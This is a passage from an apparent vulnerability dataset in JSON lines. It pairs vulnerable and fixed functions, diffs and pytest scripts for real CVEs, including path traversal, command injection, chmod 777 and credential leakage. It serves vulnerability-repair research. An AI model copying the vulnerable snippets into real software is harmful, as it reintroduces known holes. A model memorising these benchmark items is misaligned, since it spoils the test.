driverConfig.MacAddress\n\t\tlogger.Debug(\"setting container mac address\", \"mac_address\", config.MacAddress)\n\t}\n\n\treturn docker.CreateContainerOptions{\n\t\tName: containerName,\n\t\tConfig: config,\n\t\tHostConfig: hostConfig,\n\t\tNetworkingConfig: networkingConfig,\n\t}, nil\n}"}], "vul_patch": "--- a/drivers/docker/driver.go\n+++ b/drivers/docker/driver.go\n@@ -178,12 +178,23 @@\n \t\t\treturn c, err\n \t\t}\n \n-\t\tif hm.Type == \"bind\" {\n+\t\tswitch hm.Type {\n+\t\tcase \"bind\":\n \t\t\thm.Source = expandPath(task.TaskDir().Dir, hm.Source)\n \n-\t\t\t// paths inside alloc dir are always allowed as they mount within a container, and treated as relative to task dir\n+\t\t\t// paths inside alloc dir are always allowed as they mount within\n+\t\t\t// a container, and treated as relative to task dir\n \t\t\tif !d.config.Volumes.Enabled && !isParentPath(task.AllocDir, hm.Source) {\n-\t\t\t\treturn c, fmt.Errorf(\"volumes are not enabled; cannot mount host path: %q %q\", hm.Source, task.AllocDir)\n+\t\t\t\treturn c, fmt.Errorf(\n+\t\t\t\t\t\"volumes are not enabled; cannot mount host path: %q %q\",\n+\t\t\t\t\thm.Source, task.AllocDir)\n+\t\t\t}\n+\t\tcase \"tmpfs\":\n+\t\t\t// no source, so no sandbox check required\n+\t\tdefault: // \"volume\", but also any new thing that comes along\n+\t\t\tif !d.config.Volumes.Enabled {\n+\t\t\t\treturn c, fmt.Errorf(\n+\t\t\t\t\t\"volumes are not enabled; cannot mount volume: %q\", hm.Source)\n \t\t\t}\n \t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31501", "cve_description": "The ChaoticOnyx/OnyxForum repository before 2022-05-04 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/ChaoticOnyx/OnyxForum", "patch_url": ["https://github.com/ChaoticOnyx/OnyxForum/commit/f25543dfc62a9694d7e4f67eebfa45e3de916053"], "programing_language": "Python", "vul_func": [{"id": "vul_py_263_1", "commit": "4077b49", "file_path": "modules/hub/hub/views.py", "start_line": 474, "end_line": 493, "snippet": " def get(self):\n server_id = request.args[\"server\"]\n path = request.args[\"path\"]\n servers = current_app.config[\"BYOND_SERVERS\"]\n\n assert path\n assert server_id\n\n server = None\n\n for srv in servers:\n if srv.id == server_id:\n server = srv\n break\n\n if server is None:\n abort(404)\n\n file_path = os.path.join(server.logs_path, path)\n return send_file(file_path, as_attachment=True)"}], "fix_func": [{"id": "fix_py_263_1", "commit": "f25543d", "file_path": "modules/hub/hub/views.py", "start_line": 476, "end_line": 495, "snippet": " def get(self):\n server_id = request.args[\"server\"]\n path = request.args[\"path\"]\n servers = current_app.config[\"BYOND_SERVERS\"]\n\n assert path\n assert server_id\n\n server = None\n\n for srv in servers:\n if srv.id == server_id:\n server = srv\n break\n\n if server is None:\n abort(404)\n\n file_path = safe_join(server.logs_path, path)\n return send_file(file_path, as_attachment=True)"}], "vul_patch": "--- a/modules/hub/hub/views.py\n+++ b/modules/hub/hub/views.py\n@@ -16,5 +16,5 @@\n if server is None:\n abort(404)\n \n- file_path = os.path.join(server.logs_path, path)\n+ file_path = safe_join(server.logs_path, path)\n return send_file(file_path, as_attachment=True)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-2160", "cve_description": "Weak Password Requirements in GitHub repository modoboa/modoboa prior to 2.1.0.\n\n", "cwe_info": {"CWE-521": {"name": "Weak Password Requirements", "description": "The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts."}}, "repo": "https://github.com/modoboa/modoboa", "patch_url": ["https://github.com/modoboa/modoboa/commit/130257c96a2392ada795785a91178e656e27015c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_92_1", "commit": "288f62a", "file_path": "modoboa/core/forms.py", "start_line": "79", "end_line": "95", "snippet": " def clean(self):\n super().clean()\n if self.errors:\n return self.cleaned_data\n oldpassword = self.cleaned_data.get(\"oldpassword\")\n newpassword = self.cleaned_data.get(\"newpassword\")\n confirmation = self.cleaned_data.get(\"confirmation\")\n if newpassword and confirmation:\n if oldpassword:\n if newpassword != confirmation:\n self.add_error(\"confirmation\", _(\"Passwords mismatch\"))\n else:\n password_validation.validate_password(\n confirmation, self.instance)\n else:\n self.add_error(\"oldpassword\", _(\"This field is required.\"))\n return self.cleaned_data"}], "fix_func": [{"id": "fix_py_92_1", "commit": "130257c", "file_path": "modoboa/core/forms.py", "start_line": "79", "end_line": "100", "snippet": " def clean(self):\n super().clean()\n if self.errors:\n return self.cleaned_data\n oldpassword = self.cleaned_data.get(\"oldpassword\")\n newpassword = self.cleaned_data.get(\"newpassword\")\n confirmation = self.cleaned_data.get(\"confirmation\")\n if newpassword and confirmation:\n if oldpassword:\n if newpassword != confirmation:\n self.add_error(\"confirmation\", _(\"Passwords mismatch\"))\n else:\n password_validation.validate_password(\n confirmation, self.instance)\n else:\n self.add_error(\"oldpassword\", _(\"This field is required.\"))\n elif newpassword or confirmation:\n if not confirmation:\n self.add_error(\"confirmation\", _(\"This field is required.\"))\n else:\n self.add_error(\"newpassword\", _(\"This field is required.\"))\n return self.cleaned_data"}], "vul_patch": "--- a/modoboa/core/forms.py\n+++ b/modoboa/core/forms.py\n@@ -14,4 +14,9 @@\n confirmation, self.instance)\n else:\n self.add_error(\"oldpassword\", _(\"This field is required.\"))\n+ elif newpassword or confirmation:\n+ if not confirmation:\n+ self.add_error(\"confirmation\", _(\"This field is required.\"))\n+ else:\n+ self.add_error(\"newpassword\", _(\"This field is required.\"))\n return self.cleaned_data\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-22137", "cve_description": "Pingvin Share is a self-hosted file sharing platform and an alternative for WeTransfer. This vulnerability allows an authenticated or unauthenticated (if anonymous shares are allowed) user to overwrite arbitrary files on the server, including sensitive system files, via HTTP POST requests. The issue has been patched in version 1.4.0.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/stonith404/pingvin-share", "patch_url": ["https://github.com/stonith404/pingvin-share/commit/6cf5c66fe2eda1e0a525edf7440d047fe2f0e35b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_230_1", "commit": "51478b6", "file_path": "backend/src/file/file.service.ts", "start_line": 25, "end_line": 114, "snippet": " async create(\n data: string,\n chunk: { index: number; total: number },\n file: { id?: string; name: string },\n shareId: string,\n ) {\n if (!file.id) file.id = crypto.randomUUID();\n\n const share = await this.prisma.share.findUnique({\n where: { id: shareId },\n include: { files: true, reverseShare: true },\n });\n\n if (share.uploadLocked)\n throw new BadRequestException(\"Share is already completed\");\n\n let diskFileSize: number;\n try {\n diskFileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n ).size;\n } catch {\n diskFileSize = 0;\n }\n\n // If the sent chunk index and the expected chunk index doesn't match throw an error\n const chunkSize = this.config.get(\"share.chunkSize\");\n const expectedChunkIndex = Math.ceil(diskFileSize / chunkSize);\n\n if (expectedChunkIndex != chunk.index)\n throw new BadRequestException({\n message: \"Unexpected chunk received\",\n error: \"unexpected_chunk_index\",\n expectedChunkIndex,\n });\n\n const buffer = Buffer.from(data, \"base64\");\n\n // Check if there is enough space on the server\n const space = await fs.promises.statfs(SHARE_DIRECTORY);\n const availableSpace = space.bavail * space.bsize;\n if (availableSpace < buffer.byteLength) {\n throw new InternalServerErrorException(\"Not enough space on the server\");\n }\n\n // Check if share size limit is exceeded\n const fileSizeSum = share.files.reduce(\n (n, { size }) => n + parseInt(size),\n 0,\n );\n\n const shareSizeSum = fileSizeSum + diskFileSize + buffer.byteLength;\n\n if (\n shareSizeSum > this.config.get(\"share.maxSize\") ||\n (share.reverseShare?.maxShareSize &&\n shareSizeSum > parseInt(share.reverseShare.maxShareSize))\n ) {\n throw new HttpException(\n \"Max share size exceeded\",\n HttpStatus.PAYLOAD_TOO_LARGE,\n );\n }\n\n fs.appendFileSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n buffer,\n );\n\n const isLastChunk = chunk.index == chunk.total - 1;\n if (isLastChunk) {\n fs.renameSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n );\n const fileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n ).size;\n await this.prisma.file.create({\n data: {\n id: file.id,\n name: file.name,\n size: fileSize.toString(),\n share: { connect: { id: shareId } },\n },\n });\n }\n\n return file;\n }"}], "fix_func": [{"id": "fix_js_230_1", "commit": "6cf5c66fe2eda1e0a525edf7440d047fe2f0e35b", "file_path": "backend/src/file/file.service.ts", "start_line": 26, "end_line": 119, "snippet": " async create(\n data: string,\n chunk: { index: number; total: number },\n file: { id?: string; name: string },\n shareId: string,\n ) {\n if (!file.id) {\n file.id = crypto.randomUUID();\n } else if (!isValidUUID(file.id)) {\n throw new BadRequestException(\"Invalid file ID format\");\n }\n\n const share = await this.prisma.share.findUnique({\n where: { id: shareId },\n include: { files: true, reverseShare: true },\n });\n\n if (share.uploadLocked)\n throw new BadRequestException(\"Share is already completed\");\n\n let diskFileSize: number;\n try {\n diskFileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n ).size;\n } catch {\n diskFileSize = 0;\n }\n\n // If the sent chunk index and the expected chunk index doesn't match throw an error\n const chunkSize = this.config.get(\"share.chunkSize\");\n const expectedChunkIndex = Math.ceil(diskFileSize / chunkSize);\n\n if (expectedChunkIndex != chunk.index)\n throw new BadRequestException({\n message: \"Unexpected chunk received\",\n error: \"unexpected_chunk_index\",\n expectedChunkIndex,\n });\n\n const buffer = Buffer.from(data, \"base64\");\n\n // Check if there is enough space on the server\n const space = await fs.promises.statfs(SHARE_DIRECTORY);\n const availableSpace = space.bavail * space.bsize;\n if (availableSpace < buffer.byteLength) {\n throw new InternalServerErrorException(\"Not enough space on the server\");\n }\n\n // Check if share size limit is exceeded\n const fileSizeSum = share.files.reduce(\n (n, { size }) => n + parseInt(size),\n 0,\n );\n\n const shareSizeSum = fileSizeSum + diskFileSize + buffer.byteLength;\n\n if (\n shareSizeSum > this.config.get(\"share.maxSize\") ||\n (share.reverseShare?.maxShareSize &&\n shareSizeSum > parseInt(share.reverseShare.maxShareSize))\n ) {\n throw new HttpException(\n \"Max share size exceeded\",\n HttpStatus.PAYLOAD_TOO_LARGE,\n );\n }\n\n fs.appendFileSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n buffer,\n );\n\n const isLastChunk = chunk.index == chunk.total - 1;\n if (isLastChunk) {\n fs.renameSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}.tmp-chunk`,\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n );\n const fileSize = fs.statSync(\n `${SHARE_DIRECTORY}/${shareId}/${file.id}`,\n ).size;\n await this.prisma.file.create({\n data: {\n id: file.id,\n name: file.name,\n size: fileSize.toString(),\n share: { connect: { id: shareId } },\n },\n });\n }\n\n return file;\n }"}], "vul_patch": "--- a/backend/src/file/file.service.ts\n+++ b/backend/src/file/file.service.ts\n@@ -4,7 +4,11 @@\n file: { id?: string; name: string },\n shareId: string,\n ) {\n- if (!file.id) file.id = crypto.randomUUID();\n+ if (!file.id) {\n+ file.id = crypto.randomUUID();\n+ } else if (!isValidUUID(file.id)) {\n+ throw new BadRequestException(\"Invalid file ID format\");\n+ }\n \n const share = await this.prisma.share.findUnique({\n where: { id: shareId },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41125", "cve_description": "Scrapy is a high-level web crawling and scraping framework for Python. If you use `HttpAuthMiddleware` (i.e. the `http_user` and `http_pass` spider attributes) for HTTP authentication, all requests will expose your credentials to the request target. This includes requests generated by Scrapy components, such as `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`, or as requests reached through redirects. Upgrade to Scrapy 2.5.1 and use the new `http_auth_domain` spider attribute to control which domains are allowed to receive the configured HTTP authentication credentials. If you are using Scrapy 1.8 or a lower version, and upgrading to Scrapy 2.5.1 is not an option, you may upgrade to Scrapy 1.8.1 instead. If you cannot upgrade, set your HTTP authentication credentials on a per-request basis, using for example the `w3lib.http.basic_auth_header` function to convert your credentials into a value that you can assign to the `Authorization` header of your request, instead of defining your credentials globally using `HttpAuthMiddleware`.", "cwe_info": {"CWE-522": {"name": "Insufficiently Protected Credentials", "description": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval."}}, "repo": "https://github.com/scrapy/scrapy", "patch_url": ["https://github.com/scrapy/scrapy/commit/b01d69a1bf48060daec8f751368622352d8b85a6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_50_1", "commit": "4183925", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 22, "end_line": 26, "snippet": " def spider_opened(self, spider):\n usr = getattr(spider, 'http_user', '')\n pwd = getattr(spider, 'http_pass', '')\n if usr or pwd:\n self.auth = basic_auth_header(usr, pwd)"}, {"id": "vul_py_50_2", "commit": "4183925", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 28, "end_line": 31, "snippet": " def process_request(self, request, spider):\n auth = getattr(self, 'auth', None)\n if auth and b'Authorization' not in request.headers:\n request.headers[b'Authorization'] = auth"}], "fix_func": [{"id": "fix_py_50_1", "commit": "b01d69a1bf48060daec8f751368622352d8b85a6", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 26, "end_line": 40, "snippet": " def spider_opened(self, spider):\n usr = getattr(spider, 'http_user', '')\n pwd = getattr(spider, 'http_pass', '')\n if usr or pwd:\n self.auth = basic_auth_header(usr, pwd)\n if not hasattr(spider, 'http_auth_domain'):\n warnings.warn('Using HttpAuthMiddleware without http_auth_domain is deprecated and can cause security '\n 'problems if the spider makes requests to several different domains. http_auth_domain '\n 'will be set to the domain of the first request, please set it to the correct value '\n 'explicitly.',\n category=ScrapyDeprecationWarning)\n self.domain_unset = True\n else:\n self.domain = spider.http_auth_domain\n self.domain_unset = False"}, {"id": "fix_py_50_2", "commit": "b01d69a1bf48060daec8f751368622352d8b85a6", "file_path": "scrapy/downloadermiddlewares/httpauth.py", "start_line": 42, "end_line": 50, "snippet": " def process_request(self, request, spider):\n auth = getattr(self, 'auth', None)\n if auth and b'Authorization' not in request.headers:\n domain = urlparse_cached(request).hostname\n if self.domain_unset:\n self.domain = domain\n self.domain_unset = False\n if not self.domain or url_is_from_any_domain(request.url, [self.domain]):\n request.headers[b'Authorization'] = auth"}], "vul_patch": "--- a/scrapy/downloadermiddlewares/httpauth.py\n+++ b/scrapy/downloadermiddlewares/httpauth.py\n@@ -3,3 +3,13 @@\n pwd = getattr(spider, 'http_pass', '')\n if usr or pwd:\n self.auth = basic_auth_header(usr, pwd)\n+ if not hasattr(spider, 'http_auth_domain'):\n+ warnings.warn('Using HttpAuthMiddleware without http_auth_domain is deprecated and can cause security '\n+ 'problems if the spider makes requests to several different domains. http_auth_domain '\n+ 'will be set to the domain of the first request, please set it to the correct value '\n+ 'explicitly.',\n+ category=ScrapyDeprecationWarning)\n+ self.domain_unset = True\n+ else:\n+ self.domain = spider.http_auth_domain\n+ self.domain_unset = False\n\n--- a/scrapy/downloadermiddlewares/httpauth.py\n+++ b/scrapy/downloadermiddlewares/httpauth.py\n@@ -1,4 +1,9 @@\n def process_request(self, request, spider):\n auth = getattr(self, 'auth', None)\n if auth and b'Authorization' not in request.headers:\n- request.headers[b'Authorization'] = auth\n+ domain = urlparse_cached(request).hostname\n+ if self.domain_unset:\n+ self.domain = domain\n+ self.domain_unset = False\n+ if not self.domain or url_is_from_any_domain(request.url, [self.domain]):\n+ request.headers[b'Authorization'] = auth\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-41125:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-41125/bin/python -m pytest tests/test_downloadermiddleware_httpauth.py -k \"HttpAuthMiddlewareLegacyTest or HttpAuthAnyMiddlewareTest or test_no_auth or test_auth_domain or test_auth_subdomain\" -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-41125:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-41125/bin/python -m pytest tests/test_downloadermiddleware_httpauth.py -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2015-8213", "cve_description": "The get_format function in utils/formats.py in Django before 1.7.x before 1.7.11, 1.8.x before 1.8.7, and 1.9.x before 1.9rc2 might allow remote attackers to obtain sensitive application secrets via a settings key in place of a date/time format setting, as demonstrated by SECRET_KEY.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/316bc3fc9437c5960c24baceb93c73f1939711e4"], "programing_language": "Python", "vul_func": [{"id": "vul_py_12_1", "commit": "710e11d", "file_path": "django/utils/formats.py", "start_line": 85, "end_line": 120, "snippet": "def get_format(format_type, lang=None, use_l10n=None):\n \"\"\"\n For a specific format type, returns the format for the current\n language (locale), defaults to the format in the settings.\n format_type is the name of the format, e.g. 'DATE_FORMAT'\n\n If use_l10n is provided and is not None, that will force the value to\n be localized (or not), overriding the value of settings.USE_L10N.\n \"\"\"\n format_type = force_str(format_type)\n if use_l10n or (use_l10n is None and settings.USE_L10N):\n if lang is None:\n lang = get_language()\n cache_key = (format_type, lang)\n try:\n cached = _format_cache[cache_key]\n if cached is not None:\n return cached\n else:\n # Return the general setting by default\n return getattr(settings, format_type)\n except KeyError:\n for module in get_format_modules(lang):\n try:\n val = getattr(module, format_type)\n for iso_input in ISO_INPUT_FORMATS.get(format_type, ()):\n if iso_input not in val:\n if isinstance(val, tuple):\n val = list(val)\n val.append(iso_input)\n _format_cache[cache_key] = val\n return val\n except AttributeError:\n pass\n _format_cache[cache_key] = None\n return getattr(settings, format_type)"}], "fix_func": [{"id": "fix_py_12_1", "commit": "316bc3fc9437c5960c24baceb93c73f1939711e4", "file_path": "django/utils/formats.py", "start_line": 103, "end_line": 140, "snippet": "def get_format(format_type, lang=None, use_l10n=None):\n \"\"\"\n For a specific format type, returns the format for the current\n language (locale), defaults to the format in the settings.\n format_type is the name of the format, e.g. 'DATE_FORMAT'\n\n If use_l10n is provided and is not None, that will force the value to\n be localized (or not), overriding the value of settings.USE_L10N.\n \"\"\"\n format_type = force_str(format_type)\n if format_type not in FORMAT_SETTINGS:\n return format_type\n if use_l10n or (use_l10n is None and settings.USE_L10N):\n if lang is None:\n lang = get_language()\n cache_key = (format_type, lang)\n try:\n cached = _format_cache[cache_key]\n if cached is not None:\n return cached\n else:\n # Return the general setting by default\n return getattr(settings, format_type)\n except KeyError:\n for module in get_format_modules(lang):\n try:\n val = getattr(module, format_type)\n for iso_input in ISO_INPUT_FORMATS.get(format_type, ()):\n if iso_input not in val:\n if isinstance(val, tuple):\n val = list(val)\n val.append(iso_input)\n _format_cache[cache_key] = val\n return val\n except AttributeError:\n pass\n _format_cache[cache_key] = None\n return getattr(settings, format_type)"}, {"id": "fix_py_12_2", "commit": "316bc3fc9437c5960c24baceb93c73f1939711e4", "file_path": "django/utils/formats.py", "start_line": 33, "end_line": 50, "snippet": "FORMAT_SETTINGS = frozenset([\n 'DECIMAL_SEPARATOR',\n 'THOUSAND_SEPARATOR',\n 'NUMBER_GROUPING',\n 'FIRST_DAY_OF_WEEK',\n 'MONTH_DAY_FORMAT',\n 'TIME_FORMAT',\n 'DATE_FORMAT',\n 'DATETIME_FORMAT',\n 'SHORT_DATE_FORMAT',\n 'SHORT_DATETIME_FORMAT',\n 'YEAR_MONTH_FORMAT',\n 'DATE_INPUT_FORMATS',\n 'TIME_INPUT_FORMATS',\n 'DATETIME_INPUT_FORMATS',\n])\n\n"}], "vul_patch": "--- a/django/utils/formats.py\n+++ b/django/utils/formats.py\n@@ -8,6 +8,8 @@\n be localized (or not), overriding the value of settings.USE_L10N.\n \"\"\"\n format_type = force_str(format_type)\n+ if format_type not in FORMAT_SETTINGS:\n+ return format_type\n if use_l10n or (use_l10n is None and settings.USE_L10N):\n if lang is None:\n lang = get_language()\n\n--- /dev/null\n+++ b/django/utils/formats.py\n@@ -0,0 +1,17 @@\n+FORMAT_SETTINGS = frozenset([\n+ 'DECIMAL_SEPARATOR',\n+ 'THOUSAND_SEPARATOR',\n+ 'NUMBER_GROUPING',\n+ 'FIRST_DAY_OF_WEEK',\n+ 'MONTH_DAY_FORMAT',\n+ 'TIME_FORMAT',\n+ 'DATE_FORMAT',\n+ 'DATETIME_FORMAT',\n+ 'SHORT_DATE_FORMAT',\n+ 'SHORT_DATETIME_FORMAT',\n+ 'YEAR_MONTH_FORMAT',\n+ 'DATE_INPUT_FORMATS',\n+ 'TIME_INPUT_FORMATS',\n+ 'DATETIME_INPUT_FORMATS',\n+])\n+\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-8213:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2015-8213/bin/python ./runtests.py i18n.tests.FormattingTests.test_format_arbitrary_settings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-8213:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2015-8213/bin/python ./runtests.py i18n.tests\n"} {"cve_id": "CVE-2023-23939", "cve_description": "Azure/setup-kubectl is a GitHub Action for installing Kubectl. This vulnerability only impacts versions before version 3. An insecure temporary creation of a file allows other actors on the Actions runner to replace the Kubectl binary created by this action because it is world writable. This Kubectl tool installer runs `fs.chmodSync(kubectlPath, 777)` to set permissions on the Kubectl binary, however, this allows any local user to replace the Kubectl binary. This allows privilege escalation to the user that can also run kubectl, most likely root. This attack is only possible if an attacker somehow breached the GitHub actions runner or if a user is utilizing an Action that maliciously executes this attack. This has been fixed and released in all versions `v3` and later. 775 permissions are used instead. Users are advised to upgrade. There are no known workarounds for this issue.\n", "cwe_info": {"CWE-732": {"name": "Incorrect Permission Assignment for Critical Resource", "description": "The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors."}}, "repo": "https://github.com/Azure/setup-kubectl", "patch_url": ["https://github.com/Azure/setup-kubectl/commit/d449d75495d2b9d1463555bb00ca3dca77a42ab6"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_222_1", "commit": "3866693", "file_path": "src/run.ts", "start_line": 41, "end_line": 62, "snippet": "export async function downloadKubectl(version: string): Promise {\n let cachedToolpath = toolCache.find(kubectlToolName, version);\n let kubectlDownloadPath = '';\n const arch = getKubectlArch();\n if (!cachedToolpath) {\n try {\n kubectlDownloadPath = await toolCache.downloadTool(getkubectlDownloadURL(version, arch));\n } catch (exception) {\n if (exception instanceof toolCache.HTTPError && exception.httpStatusCode === 404) {\n throw new Error(util.format(\"Kubectl '%s' for '%s' arch not found.\", version, arch));\n } else {\n throw new Error('DownloadKubectlFailed');\n }\n }\n\n cachedToolpath = await toolCache.cacheFile(kubectlDownloadPath, kubectlToolName + getExecutableExtension(), kubectlToolName, version);\n }\n\n const kubectlPath = path.join(cachedToolpath, kubectlToolName + getExecutableExtension());\n fs.chmodSync(kubectlPath, '777');\n return kubectlPath;\n}"}], "fix_func": [{"id": "fix_js_222_1", "commit": "d449d75495d2b9d1463555bb00ca3dca77a42ab6", "file_path": "src/run.ts", "start_line": 41, "end_line": 62, "snippet": "export async function downloadKubectl(version: string): Promise {\n let cachedToolpath = toolCache.find(kubectlToolName, version);\n let kubectlDownloadPath = '';\n const arch = getKubectlArch();\n if (!cachedToolpath) {\n try {\n kubectlDownloadPath = await toolCache.downloadTool(getkubectlDownloadURL(version, arch));\n } catch (exception) {\n if (exception instanceof toolCache.HTTPError && exception.httpStatusCode === 404) {\n throw new Error(util.format(\"Kubectl '%s' for '%s' arch not found.\", version, arch));\n } else {\n throw new Error('DownloadKubectlFailed');\n }\n }\n\n cachedToolpath = await toolCache.cacheFile(kubectlDownloadPath, kubectlToolName + getExecutableExtension(), kubectlToolName, version);\n }\n\n const kubectlPath = path.join(cachedToolpath, kubectlToolName + getExecutableExtension());\n fs.chmodSync(kubectlPath, '775');\n return kubectlPath;\n}"}], "vul_patch": "--- a/src/run.ts\n+++ b/src/run.ts\n@@ -17,6 +17,6 @@\n }\n \n const kubectlPath = path.join(cachedToolpath, kubectlToolName + getExecutableExtension());\n- fs.chmodSync(kubectlPath, '777');\n+ fs.chmodSync(kubectlPath, '775');\n return kubectlPath;\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-4445", "cve_description": "The fix_lookup_id function in sealert in setroubleshoot before 3.2.23 allows local users to execute arbitrary commands as root by triggering an SELinux denial with a crafted file name, related to executing external commands with the commands.getstatusoutput function.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/fedora-selinux/setroubleshoot", "patch_url": ["https://github.com/fedora-selinux/setroubleshoot/commit/2d12677629ca319310f6263688bb1b7f676c01b7"], "programing_language": "Python", "vul_func": [{"id": "vul_py_269_1", "commit": "e83aa2e", "file_path": "framework/src/sealert", "start_line": 143, "end_line": 163, "snippet": " def query_alerts_callback(sigs):\n import commands\n for siginfo in sigs.signature_list:\n for plugin in siginfo.plugin_list:\n if analysis_id == plugin.analysis_id:\n p = load_plugins(analysis_id)[0]\n if p.fixable == False:\n print _(\"Not fixable.\")\n cl.main_loop.quit()\n return\n siginfo.update_derived_template_substitutions()\n command = siginfo.substitute(p.get_fix_cmd(siginfo.audit_event, plugin.args))\n rc, output = commands.getstatusoutput(command)\n if rc == 0:\n print _(\"Successfully ran %s\" % command)\n else:\n print output\n cl.main_loop.quit()\n return\n print _(\"Plugin %s not valid for %s id\") % (analysis_id, local_id)\n cl.main_loop.quit()"}], "fix_func": [{"id": "fix_py_269_1", "commit": "2d12677", "file_path": "framework/src/sealert", "start_line": 143, "end_line": 163, "snippet": " def query_alerts_callback(sigs):\n import subprocess\n for siginfo in sigs.signature_list:\n for plugin in siginfo.plugin_list:\n if analysis_id == plugin.analysis_id:\n p = load_plugins(analysis_id)[0]\n if p.fixable == False:\n print _(\"Not fixable.\")\n cl.main_loop.quit()\n return\n siginfo.update_derived_template_substitutions()\n command = siginfo.substitute_array(p.get_fix_cmd(siginfo.audit_event, plugin.args).split())\n try:\n output = subprocess.check_output(command)\n print _(\"Successfully ran %s\" % ' '.join(command))\n except subprocess.CalledProcessError as e:\n print(e.output)\n cl.main_loop.quit()\n return\n print _(\"Plugin %s not valid for %s id\") % (analysis_id, local_id)\n cl.main_loop.quit()"}, {"id": "fix_py_269_2", "commit": "2d12677", "file_path": "framework/src/setroubleshoot/signature.py", "start_line": 463, "end_line": 464, "snippet": " def substitute_array(self, args):\n return [self.substitute(txt) for txt in args]"}], "vul_patch": "--- a/framework/src/sealert\n+++ b/framework/src/sealert\n@@ -1,5 +1,5 @@\n def query_alerts_callback(sigs):\n- import commands\n+ import subprocess\n for siginfo in sigs.signature_list:\n for plugin in siginfo.plugin_list:\n if analysis_id == plugin.analysis_id:\n@@ -9,12 +9,12 @@\n cl.main_loop.quit()\n return\n siginfo.update_derived_template_substitutions()\n- command = siginfo.substitute(p.get_fix_cmd(siginfo.audit_event, plugin.args))\n- rc, output = commands.getstatusoutput(command)\n- if rc == 0:\n- print _(\"Successfully ran %s\" % command)\n- else:\n- print output\n+ command = siginfo.substitute_array(p.get_fix_cmd(siginfo.audit_event, plugin.args).split())\n+ try:\n+ output = subprocess.check_output(command)\n+ print _(\"Successfully ran %s\" % ' '.join(command))\n+ except subprocess.CalledProcessError as e:\n+ print(e.output)\n cl.main_loop.quit()\n return\n print _(\"Plugin %s not valid for %s id\") % (analysis_id, local_id)\n\n--- /dev/null\n+++ b/framework/src/sealert\n@@ -0,0 +1,2 @@\n+ def substitute_array(self, args):\n+ return [self.substitute(txt) for txt in args]\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-18367", "cve_description": "libseccomp-golang 0.9.0 and earlier incorrectly generates BPFs that OR multiple arguments rather than ANDing them. A process running under a restrictive seccomp filter that specified multiple syscall arguments could bypass intended access restrictions by specifying a single matching argument.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/seccomp/libseccomp-golang", "patch_url": 